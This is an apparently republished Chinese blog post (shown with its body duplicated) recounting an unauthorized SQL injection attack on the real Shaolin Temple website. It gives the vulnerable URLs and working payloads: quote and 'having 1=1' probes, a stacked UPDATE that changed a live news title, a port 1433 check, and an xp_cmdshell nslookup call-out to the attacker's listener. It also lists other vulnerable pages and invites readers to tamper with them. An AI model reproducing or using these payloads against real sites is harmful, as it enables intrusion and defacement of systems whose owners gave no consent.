对少林寺网站的sql注入渗透
日期:2010-12-27 浏览次数:20979 次
刚才从新闻上听到一条消息:少林网站公布武功秘笈;呵呵!这个比较爽!
顺便就去少林寺的网站上看了看,http://www.shaolin.org.cn/
打开后,看到有新闻系统,随意浏览了一下几条新闻,都是html的,似乎没什么问题,但是当我把鼠标放到首页新闻上时,发现他的连接是“javascript:MM_openBrWindow('../../../asp/news_article.asp?
NewsID=649','news','scrollbars=yes,width=520,height=400')”,大家可能注意到了,有可能存在注入,我也是没事看电视,那就渗透一下试试。
1、输入地址:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649,
可以打开新闻,说明url正确,加'后,返回
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
Unclosed quotation mark before the character string '''.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
应该是sql数据库。
2、使用' having 1=1—,提示
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
Column 'Shaolin_NewsList.NewsID' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
很快就能获得它的表shaolin_newslist的所有字段:newsid、NewsUpdateDat、NewsTitle、NewsContent
3、接下来我测试了一下数据库用户权限
http://www.shaolin.org.cn/asp/news_article.asp?NewsID=649';
update%20shaolin_newslist%20set%20NewsTitle='少林药局数百医疗养生秘方首次向世界公开!'%20where%20newsid=649--
图:
<p><img src="http://www.coolersky.com/Images/webpage/20040808001.JPG"
alt="照片.JPG (663395 bytes)" width="527" height="234"></p>
看来对表有完整权限,可以增删改
4、接着看1433开没
telnet www.shaolin.org.cn 1433
看来开着
5、那试试数据库操作员的权限
本地监听udp 53:Nc –u –l –p 53
然后访问:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649';
exec master.dbo.xp_cmdshell 'nslookup a.com *.*.*.*'--
*为我的ip地址,
没有反应,那么应该不是sysadmin权限了
看来权限就是这些,因为没有系统的收集信息,也不打算怎么样,就到此为止!其实还有很多页面都存在这个问题,比如:
http://www.shaolin.org.cn/html/html/wu/menu4.htm
http://www.shaolin.org.cn/html/html/wu/teach_wushu.asp
中传递参数的位置,看见那些绝世武功了吗?如果你愿意,可以给他添一条“XXX”什么的,呵呵!
其实,在1年前就用过类似方法测试过本地比较大的几个信息港,随后就给他们提交了漏洞报告,但是到现在漏洞还在那里摆着,为了不给自己惹麻烦,至今也没有公布出来,还是等他们修补了,我再公布细节吧!
====================================================================================================
发给网管没反应,在bbs上,我注册coolersky后,死活没有找到怎么发帖,没辙!听天由命吧,最好不要被小日本搞定!
顺便就去少林寺的网站上看了看,http://www.shaolin.org.cn/
打开后,看到有新闻系统,随意浏览了一下几条新闻,都是html的,似乎没什么问题,但是当我把鼠标放到首页新闻上时,发现他的连接是“javascript:MM_openBrWindow('../../../asp/news_article.asp?
NewsID=649','news','scrollbars=yes,width=520,height=400')”,大家可能注意到了,有可能存在注入,我也是没事看电视,那就渗透一下试试。
1、输入地址:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649,
可以打开新闻,说明url正确,加'后,返回
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
Unclosed quotation mark before the character string '''.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
应该是sql数据库。
2、使用' having 1=1—,提示
----------------------------------------------------------------------------------
Microsoft OLE DB Provider for SQL Server 错误 '80040e14'
Column 'Shaolin_NewsList.NewsID' is invalid in the select list because it is not
contained in an aggregate function and there is no GROUP BY clause.
/asp/lib/lib.asp,行710
----------------------------------------------------------------------------------
很快就能获得它的表shaolin_newslist的所有字段:newsid、NewsUpdateDat、NewsTitle、NewsContent
3、接下来我测试了一下数据库用户权限
http://www.shaolin.org.cn/asp/news_article.asp?NewsID=649';
update%20shaolin_newslist%20set%20NewsTitle='少林药局数百医疗养生秘方首次向世界公开!'%20where%20newsid=649--
图:
<p><img src="http://www.coolersky.com/Images/webpage/20040808001.JPG"
alt="照片.JPG (663395 bytes)" width="527" height="234"></p>
看来对表有完整权限,可以增删改
4、接着看1433开没
telnet www.shaolin.org.cn 1433
看来开着
5、那试试数据库操作员的权限
本地监听udp 53:Nc –u –l –p 53
然后访问:
http://www.shaolin.org.cn/../../../asp/news_article.asp?NewsID=649';
exec master.dbo.xp_cmdshell 'nslookup a.com *.*.*.*'--
*为我的ip地址,
没有反应,那么应该不是sysadmin权限了
看来权限就是这些,因为没有系统的收集信息,也不打算怎么样,就到此为止!其实还有很多页面都存在这个问题,比如:
http://www.shaolin.org.cn/html/html/wu/menu4.htm
http://www.shaolin.org.cn/html/html/wu/teach_wushu.asp
中传递参数的位置,看见那些绝世武功了吗?如果你愿意,可以给他添一条“XXX”什么的,呵呵!
其实,在1年前就用过类似方法测试过本地比较大的几个信息港,随后就给他们提交了漏洞报告,但是到现在漏洞还在那里摆着,为了不给自己惹麻烦,至今也没有公布出来,还是等他们修补了,我再公布细节吧!
====================================================================================================
发给网管没反应,在bbs上,我注册coolersky后,死活没有找到怎么发帖,没辙!听天由命吧,最好不要被小日本搞定!
免责声明: 本文仅代表作者个人观点,与爱易网无关。其原创性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
